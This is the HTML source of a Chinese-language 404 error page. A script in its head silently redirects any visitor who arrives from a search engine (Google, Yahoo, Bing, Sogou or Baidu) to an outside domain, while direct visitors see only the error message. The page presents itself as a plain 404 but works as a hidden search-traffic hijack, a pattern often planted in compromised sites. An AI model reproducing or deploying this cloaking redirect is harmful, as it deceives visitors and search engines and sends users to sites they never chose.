<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">	
<link rel="stylesheet" type="text/css" href="/404_static/css/error.css">
<title>404</title>
<script type="text/javascript">
var r=document.referrer;
if(r.indexOf("google")>0 || r.indexOf("yahoo")>0 || r.indexOf("bing")>0 || r.indexOf("sogou")>0 || r.indexOf("baidu")>0 ){
location.href="https://www.jdclub.cc/";
}
</script>	
<style type="text/css">
	.mx-tip-panel:focus{outline:0;} 
	.mx_keyword{line-height:20px; color:#333333; font-size:14px; letter-spacing: 0.2px;font-family:PingFangSC-Semibold;}
	.mx-scrollbar::-webkit-scrollbar{width:8px;height:1px;}
	.mx-scrollbar{overflow-y:auto; max-height:380px; }
	.mx-scrollbar::-webkit-scrollbar-thumb{border-radius:4px; background: #C0C0C0;}
	.mx-scrollbar::-webkit-scrollbar-track{border-radius:4px; background: #eeeeee;}
	.maxthon_tip{background-color:white; border:none;}
	.maxthon_tip:active{background-color: #E6F4FF;border:1px solid #449EFB; }
	.maxthon_tip:hover{background-color:#E6F4FF; border:1px solid #449EFB;}
</style>
</head>
	<body>	
		<div class="kaicz_404 container">
			<img src="/404_static/picture/404.gif">
			<h2>抱歉，您访问的页面出错了</h2>
			<p>您可能输错了网址，或该网页已删除或不存在</p>
			<a href="/" class="btn btn-primary btn_blue">返回主页</a>
		</div>
	</body>
</html>